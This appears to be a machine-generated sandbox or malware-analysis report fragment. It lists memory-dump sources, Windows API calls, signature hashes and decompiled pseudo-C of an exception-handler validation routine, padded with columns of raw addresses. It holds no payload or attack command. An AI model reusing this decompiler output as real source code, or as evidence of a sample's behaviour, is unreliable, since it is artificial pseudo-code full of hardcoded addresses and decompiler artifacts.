                                                                                                                                  0x00a3b249
                                                                                                                                  0x00a3b25c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b25c
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b249
                                                                                                                                  0x00a3b1bb
                                                                                                                                  0x00a3b1be
                                                                                                                                  0x00a3b1c1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1c3
                                                                                                                                  0x00a3b1c5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00a3b1c5
                                                                                                                                  0x00a3b18a
                                                                                                                                  0x00a3b18c
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00A3B1FA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryQueryVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2850889275-0
                                                                                                                                  • Opcode ID: 24921445742bf6ff5ab3cf8d056ce8dcd8acb475363d542a2da8a511031fcbd5
                                                                                                                                  • Instruction ID: 186fea2f6cfee54ba90feefc42c54d5a1346d079f91c8d0431832cc42cee40cc
                                                                                                                                  • Opcode Fuzzy Hash: 24921445742bf6ff5ab3cf8d056ce8dcd8acb475363d542a2da8a511031fcbd5
                                                                                                                                  • Instruction Fuzzy Hash: 2061C230A20616DFDB59CF69D8D06AAB3A3FB85354F248229FA15CF5A1E731DC42C760
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D23D5(long _a4) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				short* _v32;
                                                                                                                                  				void _v36;
                                                                                                                                  				void* _t57;
                                                                                                                                  				signed int _t58;
                                                                                                                                  				signed int _t61;
                                                                                                                                  				signed int _t62;
                                                                                                                                  				void* _t63;
                                                                                                                                  				signed int* _t68;
                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                  				intOrPtr* _t71;
                                                                                                                                  				intOrPtr _t72;
                                                                                                                                  				intOrPtr _t75;
                                                                                                                                  				void* _t76;
                                                                                                                                  				signed int _t77;
                                                                                                                                  				void* _t78;
                                                                                                                                  				void _t80;
                                                                                                                                  				signed int _t81;
                                                                                                                                  				signed int _t84;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				short* _t87;
                                                                                                                                  				void* _t89;
                                                                                                                                  				signed int* _t90;
                                                                                                                                  				long _t91;
                                                                                                                                  				signed int _t93;
                                                                                                                                  				signed int _t94;
                                                                                                                                  				signed int _t100;
                                                                                                                                  				signed int _t102;
                                                                                                                                  				void* _t104;
                                                                                                                                  				long _t108;
                                                                                                                                  				signed int _t110;
                                                                                                                                  
                                                                                                                                  				_t108 = _a4;
                                                                                                                                  				_t76 =  *(_t108 + 8);
                                                                                                                                  				if((_t76 & 0x00000003) != 0) {
                                                                                                                                  					L3:
                                                                                                                                  					return 0;
                                                                                                                                  				}
                                                                                                                                  				_a4 =  *[fs:0x4];
                                                                                                                                  				_v8 =  *[fs:0x8];
                                                                                                                                  				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                  					_t102 =  *(_t108 + 0xc);
                                                                                                                                  					__eflags = _t102 - 0xffffffff;
                                                                                                                                  					if(_t102 != 0xffffffff) {
                                                                                                                                  						_t91 = 0;
                                                                                                                                  						__eflags = 0;
                                                                                                                                  						_a4 = 0;
                                                                                                                                  						_t57 = _t76;
                                                                                                                                  						do {
                                                                                                                                  							_t80 =  *_t57;
                                                                                                                                  							__eflags = _t80 - 0xffffffff;
                                                                                                                                  							if(_t80 == 0xffffffff) {
                                                                                                                                  								goto L9;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t80 - _t91;
                                                                                                                                  							if(_t80 >= _t91) {
                                                                                                                                  								L20:
                                                                                                                                  								_t63 = 0;
                                                                                                                                  								L60:
                                                                                                                                  								return _t63;
                                                                                                                                  							}
                                                                                                                                  							L9:
                                                                                                                                  							__eflags =  *(_t57 + 4);
                                                                                                                                  							if( *(_t57 + 4) != 0) {
                                                                                                                                  								_t12 =  &_a4;
                                                                                                                                  								 *_t12 = _a4 + 1;
                                                                                                                                  								__eflags =  *_t12;
                                                                                                                                  							}
                                                                                                                                  							_t91 = _t91 + 1;
                                                                                                                                  							_t57 = _t57 + 0xc;
                                                                                                                                  							__eflags = _t91 - _t102;
                                                                                                                                  						} while (_t91 <= _t102);
                                                                                                                                  						__eflags = _a4;
                                                                                                                                  						if(_a4 == 0) {
                                                                                                                                  							L15:
                                                                                                                                  							_t81 =  *0x6e8d41f8;
                                                                                                                                  							_t110 = _t76 & 0xfffff000;
                                                                                                                                  							_t58 = 0;
                                                                                                                                  							__eflags = _t81;
                                                                                                                                  							if(_t81 <= 0) {
                                                                                                                                  								L18:
                                                                                                                                  								_t104 = _t102 | 0xffffffff;
                                                                                                                                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                  								__eflags = _t61;
                                                                                                                                  								if(_t61 < 0) {
                                                                                                                                  									_t62 = 0;
                                                                                                                                  									__eflags = 0;
                                                                                                                                  								} else {
                                                                                                                                  									_t62 = _a4;
                                                                                                                                  								}
                                                                                                                                  								__eflags = _t62;
                                                                                                                                  								if(_t62 == 0) {
                                                                                                                                  									L59:
                                                                                                                                  									_t63 = _t104;
                                                                                                                                  									goto L60;
                                                                                                                                  								} else {
                                                                                                                                  									__eflags = _v12 - 0x1000000;
                                                                                                                                  									if(_v12 != 0x1000000) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _v16 & 0x000000cc;
                                                                                                                                  									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                  										L46:
                                                                                                                                  										_t63 = 1;
                                                                                                                                  										 *0x6e8d4240 = 1;
                                                                                                                                  										__eflags =  *0x6e8d4240;
                                                                                                                                  										if( *0x6e8d4240 != 0) {
                                                                                                                                  											goto L60;
                                                                                                                                  										}
                                                                                                                                  										_t84 =  *0x6e8d41f8;
                                                                                                                                  										__eflags = _t84;
                                                                                                                                  										_t93 = _t84;
                                                                                                                                  										if(_t84 <= 0) {
                                                                                                                                  											L51:
                                                                                                                                  											__eflags = _t93;
                                                                                                                                  											if(_t93 != 0) {
                                                                                                                                  												L58:
                                                                                                                                  												 *0x6e8d4240 = 0;
                                                                                                                                  												goto L5;
                                                                                                                                  											}
                                                                                                                                  											_t77 = 0xf;
                                                                                                                                  											__eflags = _t84 - _t77;
                                                                                                                                  											if(_t84 <= _t77) {
                                                                                                                                  												_t77 = _t84;
                                                                                                                                  											}
                                                                                                                                  											_t94 = 0;
                                                                                                                                  											__eflags = _t77;
                                                                                                                                  											if(_t77 < 0) {
                                                                                                                                  												L56:
                                                                                                                                  												__eflags = _t84 - 0x10;
                                                                                                                                  												if(_t84 < 0x10) {
                                                                                                                                  													_t86 = _t84 + 1;
                                                                                                                                  													__eflags = _t86;
                                                                                                                                  													 *0x6e8d41f8 = _t86;
                                                                                                                                  												}
                                                                                                                                  												goto L58;
                                                                                                                                  											} else {
                                                                                                                                  												do {
                                                                                                                                  													_t68 = 0x6e8d4200 + _t94 * 4;
                                                                                                                                  													_t94 = _t94 + 1;
                                                                                                                                  													__eflags = _t94 - _t77;
                                                                                                                                  													 *_t68 = _t110;
                                                                                                                                  													_t110 =  *_t68;
                                                                                                                                  												} while (_t94 <= _t77);
                                                                                                                                  												goto L56;
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										_t69 = 0x6e8d41fc + _t84 * 4;
                                                                                                                                  										while(1) {
                                                                                                                                  											__eflags =  *_t69 - _t110;
                                                                                                                                  											if( *_t69 == _t110) {
                                                                                                                                  												goto L51;
                                                                                                                                  											}
                                                                                                                                  											_t93 = _t93 - 1;
                                                                                                                                  											_t69 = _t69 - 4;
                                                                                                                                  											__eflags = _t93;
                                                                                                                                  											if(_t93 > 0) {
                                                                                                                                  												continue;
                                                                                                                                  											}
                                                                                                                                  											goto L51;
                                                                                                                                  										}
                                                                                                                                  										goto L51;
                                                                                                                                  									}
                                                                                                                                  									_t87 = _v32;
                                                                                                                                  									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                  									if( *_t87 != 0x5a4d) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                  									__eflags =  *_t71 - 0x4550;
                                                                                                                                  									if( *_t71 != 0x4550) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									_t78 = _t76 - _t87;
                                                                                                                                  									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                  									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                  										goto L59;
                                                                                                                                  									}
                                                                                                                                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                  									__eflags = _t78 - _t72;
                                                                                                                                  									if(_t78 < _t72) {
                                                                                                                                  										goto L46;
                                                                                                                                  									}
                                                                                                                                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                  										goto L46;
                                                                                                                                  									}
                                                                                                                                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                  										goto L20;
                                                                                                                                  									}
                                                                                                                                  									goto L46;
                                                                                                                                  								}
                                                                                                                                  							} else {
                                                                                                                                  								goto L16;
                                                                                                                                  							}
                                                                                                                                  							while(1) {
                                                                                                                                  								L16:
                                                                                                                                  								__eflags =  *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) - _t110;
                                                                                                                                  								if( *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) == _t110) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t58 = _t58 + 1;
                                                                                                                                  								__eflags = _t58 - _t81;
                                                                                                                                  								if(_t58 < _t81) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								goto L18;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t58;
                                                                                                                                  							if(_t58 <= 0) {
                                                                                                                                  								goto L5;
                                                                                                                                  							}
                                                                                                                                  							 *0x6e8d4240 = 1;
                                                                                                                                  							__eflags =  *0x6e8d4240;
                                                                                                                                  							if( *0x6e8d4240 != 0) {
                                                                                                                                  								goto L5;
                                                                                                                                  							}
                                                                                                                                  							__eflags =  *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) - _t110;
                                                                                                                                  							if( *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) == _t110) {
                                                                                                                                  								L32:
                                                                                                                                  								_t100 = 0;
                                                                                                                                  								__eflags = _t58;
                                                                                                                                  								if(_t58 < 0) {
                                                                                                                                  									L34:
                                                                                                                                  									 *0x6e8d4240 = 0;
                                                                                                                                  									goto L5;
                                                                                                                                  								} else {
                                                                                                                                  									goto L33;
                                                                                                                                  								}
                                                                                                                                  								do {
                                                                                                                                  									L33:
                                                                                                                                  									_t90 = 0x6e8d4200 + _t100 * 4;
                                                                                                                                  									_t100 = _t100 + 1;
                                                                                                                                  									__eflags = _t100 - _t58;
                                                                                                                                  									 *_t90 = _t110;
                                                                                                                                  									_t110 =  *_t90;
                                                                                                                                  								} while (_t100 <= _t58);
                                                                                                                                  								goto L34;
                                                                                                                                  							}
                                                                                                                                  							_t58 = _t81 - 1;
                                                                                                                                  							__eflags = _t58;
                                                                                                                                  							if(_t58 < 0) {
                                                                                                                                  								L28:
                                                                                                                                  								__eflags = _t81 - 0x10;
                                                                                                                                  								if(_t81 < 0x10) {
                                                                                                                                  									_t81 = _t81 + 1;
                                                                                                                                  									__eflags = _t81;
                                                                                                                                  									 *0x6e8d41f8 = _t81;
                                                                                                                                  								}
                                                                                                                                  								_t58 = _t81 - 1;
                                                                                                                                  								goto L32;
                                                                                                                                  							} else {
                                                                                                                                  								goto L25;
                                                                                                                                  							}
                                                                                                                                  							while(1) {
                                                                                                                                  								L25:
                                                                                                                                  								__eflags =  *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) - _t110;
                                                                                                                                  								if( *((intOrPtr*)(0x6e8d4200 + _t58 * 4)) == _t110) {
                                                                                                                                  									break;
                                                                                                                                  								}
                                                                                                                                  								_t58 = _t58 - 1;
                                                                                                                                  								__eflags = _t58;
                                                                                                                                  								if(_t58 >= 0) {
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							__eflags = _t58;
                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                  								if(__eflags == 0) {
                                                                                                                                  									goto L34;
                                                                                                                                  								}
                                                                                                                                  								goto L32;
                                                                                                                                  							}
                                                                                                                                  							goto L28;
                                                                                                                                  						}
                                                                                                                                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                  						__eflags = _t75 - _v8;
                                                                                                                                  						if(_t75 < _v8) {
                                                                                                                                  							goto L20;
                                                                                                                                  						}
                                                                                                                                  						__eflags = _t75 - _t108;
                                                                                                                                  						if(_t75 >= _t108) {
                                                                                                                                  							goto L20;
                                                                                                                                  						}
                                                                                                                                  						goto L15;
                                                                                                                                  					}
                                                                                                                                  					L5:
                                                                                                                                  					_t63 = 1;
                                                                                                                                  					goto L60;
                                                                                                                                  				} else {
                                                                                                                                  					goto L3;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x6e8d2467
                                                                                                                                  0x6e8d2467
                                                                                                                                  0x6e8d246e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2470
                                                                                                                                  0x6e8d2471
                                                                                                                                  0x6e8d2473
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2473
                                                                                                                                  0x6e8d249b
                                                                                                                                  0x6e8d249d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24ad
                                                                                                                                  0x6e8d24af
                                                                                                                                  0x6e8d24b1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24b7
                                                                                                                                  0x6e8d24be
                                                                                                                                  0x6e8d24ea
                                                                                                                                  0x6e8d24ea
                                                                                                                                  0x6e8d24ec
                                                                                                                                  0x6e8d24ee
                                                                                                                                  0x6e8d2502
                                                                                                                                  0x6e8d2504
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24f0
                                                                                                                                  0x6e8d24f0
                                                                                                                                  0x6e8d24f0
                                                                                                                                  0x6e8d24f9
                                                                                                                                  0x6e8d24fa
                                                                                                                                  0x6e8d24fc
                                                                                                                                  0x6e8d24fe
                                                                                                                                  0x6e8d24fe
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24f0
                                                                                                                                  0x6e8d24c0
                                                                                                                                  0x6e8d24c3
                                                                                                                                  0x6e8d24c5
                                                                                                                                  0x6e8d24d7
                                                                                                                                  0x6e8d24d7
                                                                                                                                  0x6e8d24da
                                                                                                                                  0x6e8d24dc
                                                                                                                                  0x6e8d24dc
                                                                                                                                  0x6e8d24dd
                                                                                                                                  0x6e8d24dd
                                                                                                                                  0x6e8d24e3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24c7
                                                                                                                                  0x6e8d24c7
                                                                                                                                  0x6e8d24c7
                                                                                                                                  0x6e8d24ce
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24d0
                                                                                                                                  0x6e8d24d0
                                                                                                                                  0x6e8d24d1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24d1
                                                                                                                                  0x6e8d24d3
                                                                                                                                  0x6e8d24d5
                                                                                                                                  0x6e8d24e8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24e8
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d24d5
                                                                                                                                  0x6e8d2447
                                                                                                                                  0x6e8d244a
                                                                                                                                  0x6e8d244d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d244f
                                                                                                                                  0x6e8d2451
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x6e8d2451
                                                                                                                                  0x6e8d2416
                                                                                                                                  0x6e8d2418
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E8D2486
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryQueryVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2850889275-0
                                                                                                                                  • Opcode ID: 5649d428ed47da11ec4ef0a01fbe7aad667313889e2e80295eb15f59273d7fed
                                                                                                                                  • Instruction ID: cacd5d3117400bba96c35f0eef031e4a15cc83a7ce22c54ea43f1eb3c5add07b
                                                                                                                                  • Opcode Fuzzy Hash: 5649d428ed47da11ec4ef0a01fbe7aad667313889e2e80295eb15f59273d7fed
                                                                                                                                  • Instruction Fuzzy Hash: 8661E730614516CFEB96CFEDDAA0A5933B6FB85314B248D69DC26C71C4F738D88AC680
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(6E93E4D3,00000001,00000000,?,-00000050,?,6E93EB01,00000000,?,?,?,00000055,?), ref: 6E93E41F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                  • Opcode ID: 8ce4dc85f7f05d7cbb5081f043e070444c4953912fdb3be74504236485fbce07
                                                                                                                                  • Instruction ID: ec4df1d747b66a7f4f7eb34ee97d0d554dccf7db8d58512a4246da976acf555f
                                                                                                                                  • Opcode Fuzzy Hash: 8ce4dc85f7f05d7cbb5081f043e070444c4953912fdb3be74504236485fbce07
                                                                                                                                  • Instruction Fuzzy Hash: 31112C376187059FDB189FB5C4945AAB7A5FF84328B24443DE94647700E371F902CB40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(6E93E726,00000001,00000000,?,-00000050,?,6E93EAC5,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6E93E492
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                  • Opcode ID: 5e89e090f99e95e2a37099d80e09374f080dfe6f4518d0c165553431e5f5111e
                                                                                                                                  • Instruction ID: 5d7f11fcc7e1f6e7a592e8ae722fd64cc4789abfe046f12bde312d80ec3096c8
                                                                                                                                  • Opcode Fuzzy Hash: 5e89e090f99e95e2a37099d80e09374f080dfe6f4518d0c165553431e5f5111e
                                                                                                                                  • Instruction Fuzzy Hash: 70F0F6362043145FDB245FF9D898AAABBA9EFC5378F25882DE9454B740D7B1EC01CB10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E91843F: RtlEnterCriticalSection.NTDLL(?), ref: 6E91844E
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(6E93041C,00000001,6E978410,0000000C,6E930CBD,00000000), ref: 6E930461
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                  • Opcode ID: b97751cffa8c9626ad83faed5d905fcf054dfcab8ca539a9b2afe4c787c3ddc9
                                                                                                                                  • Instruction ID: 4e5737b4a39d99a815b47dfb66b9ae05dac4464cb8e04b32bd058bd254b887ea
                                                                                                                                  • Opcode Fuzzy Hash: b97751cffa8c9626ad83faed5d905fcf054dfcab8ca539a9b2afe4c787c3ddc9
                                                                                                                                  • Instruction Fuzzy Hash: C6F037B2A08614DFDB14DF98D406B9C77F1FF86329F10852AE5109B390DBB589018F40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E92F299: GetLastError.KERNEL32(00000000,00000000,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000,00000004), ref: 6E92F29E
                                                                                                                                    • Part of subcall function 6E92F299: SetLastError.KERNEL32(00000000,6E97A1A0,000000FF,?,6E927CF9,?,?,00000003,?,6E8F1083,6E8F10F4,?,6E8F0EE0,00000000,00000000,00000000), ref: 6E92F33C
                                                                                                                                  • EnumSystemLocalesW.KERNEL32(6E93E29D,00000001,00000000,?,?,6E93EB23,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 6E93E37B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                  • Opcode ID: be9e7473e4eb8c2592ee2234f2023605977b441d307d89f77ff6dfba030e52d7
                                                                                                                                  • Instruction ID: 304dda0d599526ac28a166a09a3cfc9f01031f352d703dfcf669ddc4a6fe1c6c
                                                                                                                                  • Opcode Fuzzy Hash: be9e7473e4eb8c2592ee2234f2023605977b441d307d89f77ff6dfba030e52d7
                                                                                                                                  • Instruction Fuzzy Hash: E0F0AB3A304305D7CB049FF5C85866ABFA9EFC2324B2A405DEE158B244C231DC43CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6E9333BC,?,20001004,00000000,00000002,?,?,6E93271D), ref: 6E930E80
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                  • Opcode ID: 1ecdc2edb4b198198d789f55fb1110279f6729f7531c43fafa7d9b63e6f61740
                                                                                                                                  • Instruction ID: 2980b46676be542dd658a049e93d512565831d633e2b5f34dc73c376acc47147
                                                                                                                                  • Opcode Fuzzy Hash: 1ecdc2edb4b198198d789f55fb1110279f6729f7531c43fafa7d9b63e6f61740
                                                                                                                                  • Instruction Fuzzy Hash: 40E04F72504568FBCF222FA2DC08EDE3E29EF89B61F204411FD1565164EB71C921AED5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,00000008,?,00000000,?,?,6E90981B,?,00000022,00000000,00000002,?,?,6E906C7B,00000000,?), ref: 6E909EE2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                  • Opcode ID: 99417140444bfd3d37fead0a4a1394f5131cf679107cb5dd69828b384b25bca8
                                                                                                                                  • Instruction ID: 9ebb66daffc46d2a15d3cbf5da4e87f4b68d5fc56af74f645368489bc9a82615
                                                                                                                                  • Opcode Fuzzy Hash: 99417140444bfd3d37fead0a4a1394f5131cf679107cb5dd69828b384b25bca8
                                                                                                                                  • Instruction Fuzzy Hash: D7E08C32504A29EB8F026FD1E8088EE3F29EF8A6217048408FA0816114DB32DC219FD0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 5f40a0dd0c4a552ff0e23014a82536aaffd7119b4394a32d190597e9de75930b
                                                                                                                                  • Instruction ID: aa7e2cd4220c81234c574cd0fa39c625b7d77e5f5f82c627cd7ad6c8cfd830bd
                                                                                                                                  • Opcode Fuzzy Hash: 5f40a0dd0c4a552ff0e23014a82536aaffd7119b4394a32d190597e9de75930b
                                                                                                                                  • Instruction Fuzzy Hash: 2B328E7592020A9FCF14CF98C990AAEBBB9EF85304F244579DC85A7319D771EA46CF80
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682362002.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                                                  • Instruction ID: ac6231c390fffe17c144cd6997c9da17a612999ed568ab5644aa858a057b9866
                                                                                                                                  • Opcode Fuzzy Hash: 1ae250e2fa9cb032ab4decf3eb4112c102881edd031f61f0994919ae6be86db0
                                                                                                                                  • Instruction Fuzzy Hash: 46515D71E04219EFDB04CF99C990AEEBBB6AF88354F188499E815AB305D734DA51CF90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 71%
